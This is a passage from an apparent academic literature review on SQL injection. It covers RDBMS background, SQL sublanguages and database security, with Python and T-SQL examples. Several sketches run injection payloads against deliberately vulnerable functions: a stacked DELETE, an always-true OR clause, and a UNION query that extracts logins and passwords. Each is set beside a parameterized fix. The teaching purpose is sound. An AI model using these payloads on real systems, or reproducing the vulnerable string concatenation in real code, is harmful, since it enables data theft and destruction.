a parameter that was supposed to be numeric.
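The numeric-parameter case described by Boyd & Keromytis and in the footnote on the CustomerID parameter can be reproduced with a minimal sketch. It is not taken from the literature reviewed: it assumes Python's built-in sqlite3 module as a stand-in for the RDBMS, a hypothetical Orders table, and DELETE FROM in place of TRUNCATE TABLE, which SQLite does not support. The executescript() call is used only to mimic an interface that accepts several statements in one batch.

```python
import sqlite3


def make_db():
    """Create an in-memory database with a small, hypothetical Orders table."""
    conn = sqlite3.connect(":memory:")
    conn.executescript(
        """
        CREATE TABLE Orders (OrderID INTEGER PRIMARY KEY, CustomerID INTEGER);
        INSERT INTO Orders (CustomerID) VALUES (104), (104), (205);
        """
    )
    return conn


def count_orders(conn):
    return conn.execute("SELECT COUNT(*) FROM Orders").fetchall()[0][0]


def get_orders_vulnerable(conn, customer_id):
    """Concatenates the raw parameter into the statement and runs the batch."""
    sql = "SELECT * FROM Orders WHERE CustomerID=" + customer_id
    # executescript() runs every statement found in the string, so a second
    # statement smuggled in after ';' is executed as well.
    conn.executescript(sql)


def get_orders_safe(conn, customer_id):
    """Rejects non-numeric input, then binds the value as a parameter."""
    value = int(customer_id)  # raises ValueError for '1;DELETE FROM Orders'
    return conn.execute(
        "SELECT * FROM Orders WHERE CustomerID=?", (value,)
    ).fetchall()


conn = make_db()
get_orders_vulnerable(conn, "104")
rows_after_legit = count_orders(conn)       # legitimate call leaves data alone

get_orders_vulnerable(conn, "1;DELETE FROM Orders")
rows_after_attack = count_orders(conn)      # injected second statement ran

conn2 = make_db()
try:
    get_orders_safe(conn2, "1;DELETE FROM Orders")
    rejected = False
except ValueError:
    rejected = True
rows_after_safe = count_orders(conn2)
```

The only difference between the two functions is whether the parameter is treated as text to be pasted into the statement or as a value that must be numeric, which is the validation gap the cited authors point to.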
Now that a survey of the existing definitions for the research topic has been presented, it
should be clear that a formal unifying definition is yet to be proposed, possibly because
the topic is still poorly studied (Landsmann & Strömberg 2003). Regardless of that fact,
this exercise did yield some valuable pieces of information loosely orbiting the three
causative key factors mentioned before: i) dynamically-generated string literals; ii)
embedding into SQL statements; iii) escaping. These factors are cut across
by a) the tiered application model; b) user input validation logic; c) the textual
representation of database query semantics. This set of structured findings will therefore
form the basis for a unifying definition of the research topic, which will be
attempted in the Taxonomy chapter.
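The three causative factors can be seen side by side in a short sketch. As before, this is only an illustration under stated assumptions: Python's sqlite3 module stands in for the RDBMS, the Users table and its contents are hypothetical, and the payload is a commonly used textbook pattern rather than one quoted from the sources above.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE Users (Login TEXT, Password TEXT);
    INSERT INTO Users VALUES ('alice', 'secret1'), ('bob', 'secret2');
    """
)


def find_user_vulnerable(login):
    # (i) a dynamically generated string literal is (ii) embedded into the
    # SQL statement text with (iii) no escaping of the quote character.
    sql = "SELECT Login FROM Users WHERE Login = '" + login + "'"
    return conn.execute(sql).fetchall()


def find_user_parameterized(login):
    # The value travels separately from the statement text, so a quote in
    # the input cannot terminate the literal.
    return conn.execute(
        "SELECT Login FROM Users WHERE Login = ?", (login,)
    ).fetchall()


payload = "x' OR '1'='1"
leaked = find_user_vulnerable(payload)         # WHERE clause becomes always true
contained = find_user_parameterized(payload)   # treated as an odd login name
```

In the vulnerable function the single quote in the payload closes the literal early and the rest of the input is parsed as SQL; in the parameterized one the whole payload remains data.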

RDBMS and SQL
This section contains a brief overview of the relational database management systems
subject and an introduction to its querying language. These subjects will not be
presented in a complex fashion as the goal is to provide a technical contextual basis for
the research topic. This section heavily relies on encyclopaedias, reports and technical
resources such as SQL Server 2005 Books Online shipped with Microsoft SQL Server 2005
and also available online for free download at Microsoft’s website.
Relational Database Management Systems – RDBMS
During the mid-20th century, the emergence of digital technology was at the origin
of a revolution which tremendously changed mankind’s ability to inventory and record
data. Text was first digitized by computers during the 1960s as a solution for
reducing the time and cost required to publish two American abstracting journals, the
Index Medicus of the National Library of Medicine and the Scientific and Technical
Aerospace Reports of the National Aeronautics and Space Administration (NASA). By the
late 1960s such bodies of digitized alphanumeric information, known as bibliographic
and numeric databases, constituted a new type of information resource (Encyclopædia
Britannica 2006), and the spark that ignited a vibrant new database
management systems industry was lit.
Though the term “database” originated from the computer industry, its meaning has
been broadened to the extent that the European Union (EU) directive 96/9/EC of the
European Parliament and of the Council of 11 March 1996 on the legal protection of
databases includes non-electronic databases within its definition. A simple definition
could be «a database is an organized collection of data» (Wikipedia 2006d), whereas,
according to the same source, a relational database is «a database structured in
accordance with the relational model». Connolly, Begg, & Strachan (1999) define it as «a
shared collection of logically related data (and a description of this data), designed to
meet the information needs of an organization». According to these two definitions, a
relational database, in strict terms, refers to a collection of structured data [8], which
subsequently implies the need for metadata [9]. On the other hand, it exists with the sole
purpose of meeting information needs. The fact that it has a purpose implies that having a
collection of structured data is not enough, as the collection itself must be managed in
order to meet specific business needs. Invariably, a database must be employed together
with the software used to manage that collection of data. This piece of software is
known as a relational database management system (RDBMS). Depending on the database
role, whether analytical or online transactional, the RDBMS will implement different
mechanisms to define the structure and manage the data.
[8] An example of unstructured data would be the collection of files on a file system. An example of semi-structured
data would be the collection of received emails in a mailbox.
[9] Metadata is defined as data about data. In this case, metadata would be the model used to define the structure
into which the data itself will be organized.
The SQL Server 2005 Books Online (Microsoft 2006) provides a brief insight into these
types of databases:
OLTP Database
Online Transaction Processing (OLTP) relational databases are optimal for managing
changing data. They typically have several users who are performing transactions at the
same time that change real-time data. Although individual requests by users for data
generally reference few rows, many of these requests are being made at the same time.
OLTP databases are designed to let transactional applications write only the data needed
to handle a single transaction as quickly as possible. OLTP databases generally do the
following:
• Support large numbers of concurrent users who are regularly adding and
modifying data;
• Represent the constantly changing state of an organization, but do not save its
history;
• Contain lots of data, including extensive data used to verify transactions;
• Have complex structures;
• Are tuned to be responsive to transaction activity;
• Provide the technology infrastructure to support the day-to-day operations of
an organization;
• Individual transactions are completed quickly and access relatively small
amounts of data. OLTP systems are designed and tuned to process hundreds or
thousands of transactions being entered at the same time.
The data in OLTP systems is organized primarily to support transactions, such as the
following:
• Recording an order from a point-of-sale terminal or entered through a Web
site;
• Placing an order for more supplies when inventory quantities drop to a
specified level;
• Tracking components as they are assembled into a final product in a
manufacturing facility;
• Recording employee data;

OLAP Database / Data Warehouse
In contrast to an OLTP database in which the purpose is to capture high rates of data
changes and additions, the purpose of a data warehouse is to organize lots of stable
data for ease of analysis and retrieval. A data warehouse is frequently used as the basis
for a business intelligence application.
The following is a list of what data warehouses can do:
• Combine data from heterogeneous data sources into a single homogenous
structure;
• Organize data in simplified structures for efficiency of analytical queries instead
of for transaction processing;
• Contain transformed data that is valid, consistent, consolidated, and formatted
for analysis;
• Provide stable data that represents business history;
• Be updated periodically with additional data instead of making frequent
transactions;
• Simplify security requirements.
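The contrast between the two database roles can be illustrated with a small sketch. It rests on several assumptions: Python's sqlite3 module is used instead of SQL Server, a single hypothetical Sales table plays both roles for brevity, and the figures are invented for the example. The first function shows the short, single-row transaction typical of OLTP work; the second shows the read-only aggregate over accumulated history typical of analytical work.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute(
    "CREATE TABLE Sales (OrderID INTEGER PRIMARY KEY, OrderMonth TEXT, Amount REAL)"
)


def record_order(month, amount):
    """OLTP-style work: one short transaction touching a single row."""
    with conn:  # commits on success, rolls back if an exception is raised
        cur = conn.execute(
            "INSERT INTO Sales (OrderMonth, Amount) VALUES (?, ?)", (month, amount)
        )
    return cur.lastrowid


def monthly_totals():
    """OLAP-style work: a read-only aggregate over the stored history."""
    return conn.execute(
        "SELECT OrderMonth, SUM(Amount) FROM Sales "
        "GROUP BY OrderMonth ORDER BY OrderMonth"
    ).fetchall()


for month, amount in [("2006-01", 10.0), ("2006-01", 5.0), ("2006-02", 7.5)]:
    record_order(month, amount)

totals = monthly_totals()
```

A real data warehouse would hold transformed, consolidated data in its own structures; the sketch only shows the difference in the shape of the work each role performs.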
Depending on the database role, the relational database structure will be radically
different, and likewise its querying language and client tools. For example, MS SQL Server
2005 uses Transact-SQL for querying OLTP databases, whereas MDX is used for querying
multi-dimensional OLAP databases. Although the research topic cuts across
database roles, one of this research’s goals is to focus on e-Business systems, which,
according to the findings gathered so far, rules out analytical systems, as they belong
rather to the strategic planning class. Furthermore, the literature puts a big emphasis on the Web and
establishes a strong correlation between SQL Injection and online data management,
stressing the bond of the research topic with OLTP databases. For this reason, this
literature review will drop sources of information that lead in the OLAP direction.
According to Anley (2002b) «there are many varieties of SQL; most dialects that are in
common use at the moment are loosely based around SQL-92, the most recent ANSI
standard». This is an indirect consequence of the existence of multiple RDBMS
vendors which, in the heat of competition, try to enhance their products with additions and
extensions that move them away from the standard. This fact alone justifies the need for a
better understanding of the existing installed base of RDBMSs. Additionally, since SQL
Injection is a logical type of attack, a thorough understanding of the attack target can
prove priceless to the attacker. According to the Gartner Group (2002), three major
players surfaced as the foremost RDBMS vendors in 2002 in an 8.8 billion USD market:
Figure 13 - Worldwide RDBMS Market Share in 2002
> adapted from (Gartner Group 2002) <
At present, Microsoft competes with MS SQL Server 2005, Oracle with Oracle
10g and IBM with DB2. Gartner (2003) also presents an analysis of how the
market evolved, as per the following diagram:
[Chart values: Microsoft 16.3%; Oracle 32%; Sybase 2.6%; Other 14.4%; IBM 31.7%]

Figure 14 - Worldwide RDBMS Market Share in 2003 Excluding Mainframes
IBM lost 2% market share to Microsoft and Oracle, yet, due to market growth, this
represented a net sales increase of 11% for both winning parties. Still, the big picture
remained pretty much unaltered. This snapshot was taken before Microsoft
released its promising new RDBMS, MS SQL Server 2005, which aims to reclaim more
market share. On the other hand, trends seem to be changing in terms of the base
operating systems used for hosting RDBMSs, and Microsoft Windows is now leading the
way with a 51% market share. This situation benefits MS SQL Server, as the same software
house that releases the operating system is in a better position to supply the RDBMS.
Due to the assortment of SQL implementations (Anley 2002b) it is prudent to reduce the
scope of the research in terms of prototyping subjects and nomenclature. For this
research, this principle can be safely applied since SQL Injection is not a problem of a
particular RDBMS vendor (Cerrudo 2002). Because of MS SQL Server’s promising future
and known flexibility (Cerrudo 2002), this platform will be used henceforward whenever
sampling, experimentation or prototyping takes place.

Data Definition Language – DDL
The SQL language has two main divisions: Data Definition Language (DDL), which is used
to define and manage all the objects in an SQL database, and Data Manipulation
Language (DML), which is used to select, insert, update, and delete data in the objects
defined using DDL (Microsoft 2006). The Transact-SQL DDL used to manage objects such
as databases, tables, and views is based on SQL-92 DDL statements and is what enables
database administrators (DBAs) to define the structure of data, also known as the schema.
Connolly, Begg, & Strachan (1999) define it as «a descriptive language that allows the
DBA or user to describe and name the entities required for the application and the
relationships that may exist between the different entities». In other words, DDL is the
SQL subset that enables the implementation of a data model. Defining such a model requires
an analysis of business and functional requirements, which is generally carried out by an
analyst. Although data modelling is out of scope for this work, DDL statements constitute
fertile ground for SQL Injection techniques. Knowing how to manipulate data
structures can take simple SQL Injection attacks from plain data manipulation to a
whole new level of exploitation. On an RDBMS, for each object class, e.g. Tables, Triggers,
etc., there are usually CREATE, ALTER, and DROP statements, such as CREATE TABLE, ALTER
TABLE, and DROP TABLE. Let’s consider a simple example where a
sales order is stored in a relational database. Although there are
several entities involved, this example only focuses on two of them: the
sales order itself, and the sales order items, as per the model in Figure 15.
Figure 15 - Simple Relational Data Structure
> adapted from “SQL Server’s AdventureWorks Database” <
These two entities are represented in the form of tables which are
linked by means of a relation: in this case, a one-to-many relation, which indicates that an
order item must always belong to an existing order, and that an existing order may have
multiple order items. The following Transact-SQL script would create such a structure on an
existing database:
/****** Object: Table [dbo].[SalesOrderHeader] ******/
CREATE TABLE [dbo].[SalesOrderHeader](
    [SalesOrderID] [int] IDENTITY(1,1) NOT FOR REPLICATION NOT NULL,
    [CustomerID] [int] NULL,
    [SalesPersonID] [int] NULL,
    [TerritoryID] [tinyint] NULL,
    [PurchaseOrderNumber] [int] NULL,
    [CurrencyCode] [nchar](3) NULL,
    [SubTotal] [money] NOT NULL CONSTRAINT [DF_SalesOrderHeader_SubTotal]
        DEFAULT (0),
    [TaxAmt] [money] NOT NULL CONSTRAINT [DF_SalesOrderHeader_TaxAmt]
        DEFAULT (0),
    [Freight] [money] NOT NULL CONSTRAINT [DF_SalesOrderHeader_Freight]
        DEFAULT (0),
    [OrderDate] [datetime] NOT NULL CONSTRAINT
        [DF_SalesOrderHeader_OrderDate] DEFAULT (getdate()),
    [RevisionNumber] [tinyint] NULL,
    [Status] [tinyint] NULL CONSTRAINT [DF_SalesOrderHeader_Status]
        DEFAULT (1),
    [BillToAddressID] [int] NULL,
    [ShipToAddressID] [int] NULL,
    [ShipDate] [datetime] NULL,
    [ShipMethodID] [tinyint] NULL,
    [CreditCardID] [tinyint] NULL,
    [CreditCardNumber] [nvarchar](20) NULL,
    [CreditCardExpMonth] [tinyint] NULL,
    [CreditCardExpYear] [smallint] NULL,
    [ContactID] [int] NULL,
    [OnlineOrderFlag] [bit] NOT NULL CONSTRAINT
        [DF_SalesOrderHeader_OnlineOrderFlag] DEFAULT (1),
    [Comment] [nvarchar](128) NULL,
    [ModifiedDate] [datetime] NOT NULL CONSTRAINT
        [DF_SalesOrderHeader_ModifiedDate] DEFAULT (getdate()),
    [rowguid] [uniqueidentifier] ROWGUIDCOL NOT NULL CONSTRAINT
        [DF_SalesOrderHeader_rowguid] DEFAULT (newid()),
    [DueDate] [datetime] NULL,
    [SalesOrderNumber] AS ('SO' + convert(nvarchar(23),[SalesOrderID])),
    [TotalDue] AS ([Freight] + [TaxAmt] + [SubTotal]),
    CONSTRAINT [PK_SalesOrderHeader_SalesOrderID] PRIMARY KEY CLUSTERED
    (
        [SalesOrderID] ASC
    ) WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]
GO

/****** Object: Table [dbo].[SalesOrderDetail] ******/
CREATE TABLE [dbo].[SalesOrderDetail](
    [SalesOrderID] [int] NOT NULL,
    [LineNumber] [tinyint] NOT NULL,
    [ProductID] [int] NULL,
    [SpecialOfferID] [int] NULL,
    [CarrierTrackingNumber] [nvarchar](25) NULL,
    [OrderQty] [smallint] NOT NULL,
    [UnitPrice] [money] NOT NULL,
    [UnitPriceDiscount] [float] NOT NULL CONSTRAINT
        [DF_SalesOrderDetail_UnitPriceDiscount] DEFAULT (0),
    [ModifiedDate] [datetime] NOT NULL CONSTRAINT
        [DF_SalesOrderDetail_ModifiedDate] DEFAULT (getdate()),
    [rowguid] [uniqueidentifier] ROWGUIDCOL NOT NULL CONSTRAINT
        [DF_SalesOrderDetail_rowguid] DEFAULT (newid()),
    [LineTotal] AS ([UnitPrice] * (1 - isnull([UnitPriceDiscount],0)) *
        [OrderQty]),
    CONSTRAINT [PK_SalesOrderDetail_SalesOrderID_LineNumber] PRIMARY KEY CLUSTERED
    (
        [SalesOrderID] ASC,
        [LineNumber] ASC
    ) WITH (IGNORE_DUP_KEY = OFF) ON [PRIMARY]
) ON [PRIMARY]
GO
/****** Relation: SalesOrderDetail/SalesOrderHeader ******/
ALTER TABLE [dbo].[SalesOrderDetail] WITH NOCHECK ADD CONSTRAINT
    [FK_SalesOrderHeader_SalesOrderDetail] FOREIGN KEY([SalesOrderID])
    REFERENCES [dbo].[SalesOrderHeader] ([SalesOrderID])
GO
ALTER TABLE [dbo].[SalesOrderDetail] CHECK CONSTRAINT
    [FK_SalesOrderHeader_SalesOrderDetail]

Although this script is rather simple, only a trained person would
be able to fully understand it and, if necessary, create one. But if defining a simple
schema takes such a vast amount of code, what about other tasks such as administrative
tasks or even core maintenance procedures? Furthermore, the SQL-92 DDL does not
encompass all of the possible tasks one might want to perform (Microsoft 2006). For this
reason, administrative tasks not covered in the SQL-92 DDL definition are typically
performed using system stored procedures. These can dramatically expand the types of
operations one can perform. However, due to their very nature, these stored procedures
are rigidly tied to the hosting RDBMS. Their existence pushes the different dialects of SQL
further away from each other. On the other hand, they can streamline the RDBMS
enormously. The following table shows the different categories of system stored procedures
shipped with MS SQL Server 2005 (Microsoft 2006):
Category | Description
Active Directory Stored Procedures | Used to register instances of SQL Server and SQL Server databases in Microsoft Windows 2000 Active Directory.
Catalog Stored Procedures | Used to implement ODBC data dictionary functions and isolate ODBC applications from changes to underlying system tables.
Cursor Stored Procedures | Used to implement cursor variable functionality.
Database Engine Stored Procedures | Used for general maintenance of the SQL Server Database Engine.
Database Mail and SQL Mail Stored Procedures | Used to perform e-mail operations from within an instance of SQL Server.
Database Maintenance Plan Stored Procedures | Used to set up core maintenance tasks that are required to manage database performance.
Distributed Queries Stored Procedures | Used to implement and manage Distributed Queries, e.g. queries that merge data from other data sources.
Full-Text Search Stored Procedures | Used to implement and query full-text indexes.
Log Shipping Stored Procedures | Used to configure, modify, and monitor log shipping configurations.
Automation Stored Procedures | Enable standard Automation objects to be used within a standard Transact-SQL batch.
Notification Services Stored Procedures | Used to manage SQL Server 2005 Notification Services.
Replication Stored Procedures | Used to manage replication.
Security Stored Procedures | Used to manage security.
SQL Server Profiler Stored Procedures | Used by SQL Server Profiler to monitor performance and activity.
SQL Server Agent Stored Procedures | Used by SQL Server Agent to manage scheduled and event-driven activities.
Web Task Stored Procedures | Used for creating Web pages.
XML Stored Procedures | Used for XML text management.
General Extended Stored Procedures | Provide an interface from an instance of SQL Server to external programs for various maintenance activities.
Table 1 - System Stored Procedures in MS SQL Server 2005
> adapted from (Microsoft 2006) <
If security is not properly set up and an SQL Injection attack takes place, these stored
procedures can multiply the impact of the attack many times over. According to Cerrudo
(2002), an information source widely cited by others in this field, «SQL Injection is not a
defect of Microsoft SQL Server (…). Perhaps the biggest issue with Microsoft SQL Server
is the flexibility of the system. This flexibility is what allows it to be subverted so far by SQL
Injection». Flexibility is in great measure achieved through the existence of such a vast
collection of embedded system stored procedures. But then again, all three major
RDBMSs ship with a rich set of system stored procedures.
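Returning to the sales order model discussed earlier in this section, the one-to-many relation and the CREATE and ALTER statements can be tried out in a reduced form. The sketch below is an approximation under stated assumptions: it uses Python's sqlite3 module rather than Transact-SQL, keeps only a handful of hypothetical columns from each table, and relies on SQLite's foreign key enforcement, which has to be switched on explicitly per connection.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.execute("PRAGMA foreign_keys = ON")  # SQLite enforces FKs only when enabled

# CREATE: define the two entities and the relation between them.
conn.executescript(
    """
    CREATE TABLE SalesOrderHeader (
        SalesOrderID INTEGER PRIMARY KEY,
        CustomerID   INTEGER
    );
    CREATE TABLE SalesOrderDetail (
        SalesOrderID INTEGER NOT NULL REFERENCES SalesOrderHeader (SalesOrderID),
        LineNumber   INTEGER NOT NULL,
        OrderQty     INTEGER NOT NULL,
        PRIMARY KEY (SalesOrderID, LineNumber)
    );
    """
)

# One order may have several items ...
conn.execute("INSERT INTO SalesOrderHeader (SalesOrderID, CustomerID) VALUES (1, 104)")
conn.execute("INSERT INTO SalesOrderDetail VALUES (1, 1, 3)")
conn.execute("INSERT INTO SalesOrderDetail VALUES (1, 2, 1)")

# ... but an item must always belong to an existing order.
try:
    conn.execute("INSERT INTO SalesOrderDetail VALUES (99, 1, 5)")
    orphan_rejected = False
except sqlite3.IntegrityError:
    orphan_rejected = True

# ALTER: change the structure of an existing object.
conn.execute("ALTER TABLE SalesOrderHeader ADD COLUMN Comment TEXT")
columns = [row[1] for row in conn.execute("PRAGMA table_info(SalesOrderHeader)")]
items_for_order_1 = conn.execute(
    "SELECT COUNT(*) FROM SalesOrderDetail WHERE SalesOrderID = 1"
).fetchall()[0][0]
```

The same statements that let a DBA evolve the schema are the ones that would let an injected statement alter or drop it, which is why the permission to run DDL matters from a security standpoint.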

Data Manipulation Language – DML
Whereas early query languages were originally so complex that interacting with electronic
databases could be done only by specially trained individuals, recent interfaces are more
user-friendly, allowing casual users to access database information (Encyclopædia
Britannica 2006). This is possible through the use of fourth-generation programming
languages (4GL) [10], as they are designed to reduce programming effort and the time and
cost of software development. One implementation of the 4GL approach is the
Structured Query Language (SQL) which has the form:
Select [field Fa, Fb, . . . , Fn]
From [database Da, Db, . . . , Dn]
Where [field Fa = abc] and [field Fb = def].
[10] Other generations are: 1GL, where no translator was used to compile or assemble the language and
programming instructions were entered through the front panel switches of the computer system; 2GL, where
the code can be read and written fairly easily by a human, but it must be converted into a 1GL machine readable
form by means of an assembler; 3GL, a programming language designed to be easier for a human to understand,
including things like named variables and objects; 5GL, based around solving problems using constraints given to
the program, rather than using an algorithm written by a programmer.
At first glance, SQL’s similarity to English may blur reality since, unlike natural languages, its
syntax is in fact limited and fixed to the point that it could be represented in tabular form.
Structured query languages support database searching and several other types of
operations, and DML is the subset that specifically addresses operations targeting data
retrieval and data manipulation. According to Wikipedia (2006c) and Microsoft
(2006), the main clauses used with the SELECT statement – the most
frequently used operation in transactional databases – include:
• FROM – is used to indicate from which sources the data is to be taken, as well
as how these join to each other. These data sources could be:
    • Base tables in the local RDBMS;
    • Views in the local RDBMS;
    • Linked tables. These are external tables accessible via OLE DB data sources;
• WHERE – is a filter that defines the conditions each row in the source tables
must meet to qualify for the SELECT. Only rows that meet the conditions
contribute data to the result set. Data from rows that do not meet the
conditions is not used. WHERE is evaluated before the GROUP BY.
• GROUP BY – partitions the result set into groups based on the values in the
columns of the group_by_list. Combines rows with related values into
elements of a smaller set of rows;
• HAVING – is an additional filter that is applied to the result set. Logically, the
HAVING clause filters rows from the intermediate result set built from applying
any FROM, WHERE, or GROUP BY clauses in the SELECT statement. HAVING
clauses are typically used with a GROUP BY clause, although a GROUP BY
clause is not required before a HAVING clause. It is used to identify which of
the "combined rows" (combined rows are produced when the query has a
GROUP BY keyword or when the SELECT part contains aggregates), are to be
retrieved. HAVING acts much like a WHERE, but it operates on the results of the
GROUP BY and hence can use aggregate functions.
• ORDER BY – defines the order in which the rows in the result set are sorted.
order_list specifies the result set columns that make up the sort list. The ASC
and DESC keywords are used to specify if the rows are sorted in an ascending
or descending sequence. Relational theory specifies that the rows in a result set
cannot be assumed to have any sequence unless ORDER BY is specified.
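The interplay of the clauses listed above can be observed on a small data set. The following sketch assumes Python's sqlite3 module in place of SQL Server and a hypothetical OrderItems table; the comments inside the statement mark the role each clause plays.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE OrderItems (CustomerID INTEGER, Product TEXT, Qty INTEGER);
    INSERT INTO OrderItems VALUES
        (104, 'Paper Clips', 10),
        (104, 'Stapler',      1),
        (205, 'Paper Clips',  2),
        (205, 'Paper Clips',  3),
        (310, 'Paper Clips',  1);
    """
)

rows = conn.execute(
    """
    SELECT CustomerID, SUM(Qty) AS TotalQty
    FROM OrderItems                 -- source of the rows
    WHERE Product = 'Paper Clips'   -- row filter, applied before grouping
    GROUP BY CustomerID             -- one combined row per customer
    HAVING SUM(Qty) >= 5            -- filter on the combined rows
    ORDER BY TotalQty DESC          -- explicit ordering of the result set
    """
).fetchall()
```

The stapler row is discarded by WHERE before any grouping happens, whereas customer 310 survives WHERE and is only dropped by HAVING, once its combined quantity is known.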

But these are the basics of the basics. So far the literature has revealed that, as the name
suggests, SQL Injection has a great deal to do with injecting other queries into legitimate
query structures. Therefore the ability to use subqueries is of high relevance when
exploring the research topic (Livshits & S.Lam 2005). According to Microsoft’s view, «a
subquery is a query that is nested inside a SELECT, INSERT, UPDATE, or DELETE statement,
or inside another subquery. A subquery can be used anywhere an expression is allowed»
(Microsoft 2006). An example would be as follows:
SELECT [Name]
FROM dbSales.Production.Product
WHERE ListPrice =
    (SELECT ListPrice
     FROM dbSales.Production.Product
     WHERE [Name] = 'Paper Clips' )
Microsoft also adds that ultimately the subquery can be evaluated as if it were an
independent query, which seems perfectly in line with what a hacker would seek when
perpetrating a SQL Injection attack. The combination of result sets is another way of
executing additional statements, as in the following example:
SELECT [Name]
FROM dbSales.Production.Product
UNION ALL
SELECT Login + '/' + Password As [Name]
FROM dbSales.Production.Employees
The result set yielded by the first statement is combined with the result set yielded by a
second statement that masquerades its output structure to match the one defined by the
first SELECT statement. The UNION, INTERSECT and EXCEPT operators combine the
result sets yielded by different data retrieval operations into a single
result set. DML is rather vast and complex and only a few instructions have been covered.
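How a UNION ALL of this kind might reach the database through an application can be sketched as follows. The example is hypothetical throughout: Python's sqlite3 module replaces SQL Server (so string concatenation is written with || instead of +), the product search function, table contents and credentials are invented, and the payload is merely one way of shaping the second SELECT to match the first.

```python
import sqlite3

conn = sqlite3.connect(":memory:")
conn.executescript(
    """
    CREATE TABLE Product (Name TEXT, ListPrice REAL);
    CREATE TABLE Employees (Login TEXT, Password TEXT);
    INSERT INTO Product VALUES ('Paper Clips', 1.5), ('Stapler', 9.0);
    INSERT INTO Employees VALUES ('admin', 'hunter2');
    """
)


def search_products_vulnerable(term):
    # The search term is pasted into the statement text unescaped.
    sql = "SELECT Name FROM Product WHERE Name LIKE '%" + term + "%'"
    return [row[0] for row in conn.execute(sql)]


# The injected SELECT returns a single text column, matching the shape of
# the legitimate one; the trailing '--' comments out the leftover "%'".
payload = "' UNION ALL SELECT Login || '/' || Password FROM Employees --"

legit_results = search_products_vulnerable("Clip")
attack_results = search_products_vulnerable(payload)
```

The application still believes it is listing product names; the extra row simply arrives in the same column as the legitimate ones.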

Data Control Language – DCL
Like DDL and DML, Data Control Language (DCL) is a fourth-generation programming
language (4GL) and also a subset of SQL, used to control access to data in a database.
The following data control statements are part of DCL:
• GRANT to allow specified users to perform specified tasks;
• REVOKE to cancel previously granted or denied permissions.
DCL is specifically used to set permissions on database objects and statements. In general,
after the database and database objects are created through DDL, the next step is to
set-up permissions using the statements provided by the Data Control Language.
Security in Databases
Understanding the inner security model of the RDBMS can serve both offending and
defending parties. To this point it has been established that SQL Injection attacks will
primarily occur using the exploited application’s security context. Primarily, because one of
the steps of the attack may encompass elevation of privileges. Nonetheless, it is
reasonable to assume that the entry point will use the current security context of the
application to authenticate against the RDBMS. Regardless of the user mapping
mechanisms in place, whether the application impersonates its own user to gain access
to the database or it forwards the user’s network credentials, a legitimate authenticated
channel is used and the options to proceed with an attack from there will be restricted by
the types of operations granted to that specific security context. Therefore a thorough
understanding of the database securables and of the operations the application needs to
perform on the RDBMS is paramount for implementing the least-privilege principle[11], the
defending party’s perspective, or for exploiting opportunities, the offending party’s goal.
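The idea that an attack is bounded by the operations granted to a security context can be sketched with SQLite's authorizer hook, exposed in Python as Connection.set_authorizer. This is only an analogy for GRANT and REVOKE on a full RDBMS, not an equivalent mechanism; the schema, the read_only_product callback and the attempt helper are hypothetical names introduced for illustration.

```python
import sqlite3

# Hypothetical schema, created before any restriction is applied.
conn = sqlite3.connect(":memory:")
conn.executescript("""
    CREATE TABLE Product (Name TEXT, ListPrice REAL);
    CREATE TABLE Employees (Login TEXT, Password TEXT);
    INSERT INTO Product VALUES ('Paper Clips', 1.5);
    INSERT INTO Employees VALUES ('admin', 's3cret');
""")


def read_only_product(action, arg1, arg2, db_name, source):
    # Least privilege: permit SELECT statements and column reads on
    # the Product table, and deny every other operation.
    if action == sqlite3.SQLITE_SELECT:
        return sqlite3.SQLITE_OK
    if action == sqlite3.SQLITE_READ and arg1 == "Product":
        return sqlite3.SQLITE_OK
    return sqlite3.SQLITE_DENY


conn.set_authorizer(read_only_product)


def attempt(sql):
    # Run a statement under the restricted context and report the outcome.
    try:
        return conn.execute(sql).fetchall()
    except sqlite3.Error as exc:
        return "denied: " + str(exc)


print(attempt("SELECT Name FROM Product"))
print(attempt("SELECT Login FROM Employees"))
print(attempt("DELETE FROM Product"))
```

Under this restricted context, even a successfully injected statement that touches Employees or modifies Product is rejected, which is the defending party's reading of the paragraph above.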
According to Connolly (1999), database security concerns «the protection of the
database against intentional or unintentional threats using computer-based or
non-computer-based controls». Though SQL Injection is clearly a computer-based kind of
attack, Connolly’s view is rather interesting as it comprises both computer-based attacks
and other types of attacks more focused on the human component, such as
Social Engineering. Regardless of the typology of the threat, all of them pose the same
risks to the information assets. Landsmann & Strömberg (2003) take this implication a
little further and claim that in addition to the risks to the information assets «poor
database security (…) may also threaten other parts of a system and thus an entire
organization». They also identify the following list of risks as being related to database
security:
• Theft and fraud which are activities made intentionally by people. This risk may
result in loss of confidentiality or privacy;
• Loss of confidentiality which refers to loss of organizational secrets;
• Loss of privacy which refers to exposure of personal information;
• Loss of integrity which refers to invalid or corrupt data;
• Loss of availability which means that data or system cannot be reached.
[11] The principle came up around the mid-1970s, but Jerry H. Saltzer & Mike D. Schroeder (1975) were the first to
systematize it by stating that «every program and every user of the system should operate using the least set of
privileges necessary to complete the job». The underlying idea is to grant just the minimum possible privileges to
permit a legitimate action, in order to enhance protection of data and functionality from faults (fault tolerance)
and malicious behaviour.

Yuhanna (2003) states that with regard to database management systems alone «security
has become increasingly important to enterprises as hackers continue to gain access to
critical and data sensitive databases, disrupting business operations». He claims that a
comprehensive DBMS security architecture should be tightly tied to the security
architectures of the interacting technology layers, including server, operating system,
network and applications. He adds that such a security architecture should comprise
i) database hardening, ii) secure administration processes, iii) tight coordination with
the application security architecture and iv) a strong approach to data protection.
Operationalizing security in databases, or any type of security for that matter, is a
complex and difficult task. The amount of literature on the subject is huge and it tends to
be very focused around a specific well-defined issue, or it is broad and generic, more in
the form of guidelines, frameworks and principles such as the least-privilege principle
mentioned before. Just as the SQL dialects deviate from the ANSI standard
SQL-92, each database vendor has its own set of security mechanisms and securable
database objects. For example, MS SQL Server 2005 can go down to the level where
some columns in a table can be set to request a valid digital signature for data retrieval.
Another good example is the possibility to revoke grants performed at a higher level.

Figure 16 - Overriding Table Permissions on MS SQL Server 2005
Other vendors implement security in different ways, but the base security mechanisms
remain fairly similar across all three main RDBMS. Securing a database requires, of course,
deep technical knowledge of that specific RDBMS. Still, this knowledge is not sufficient
for ensuring security as the RDBMS is part of a greater system, usually exposed to public
access indirectly, for instance by means of a Web application. Therefore, a
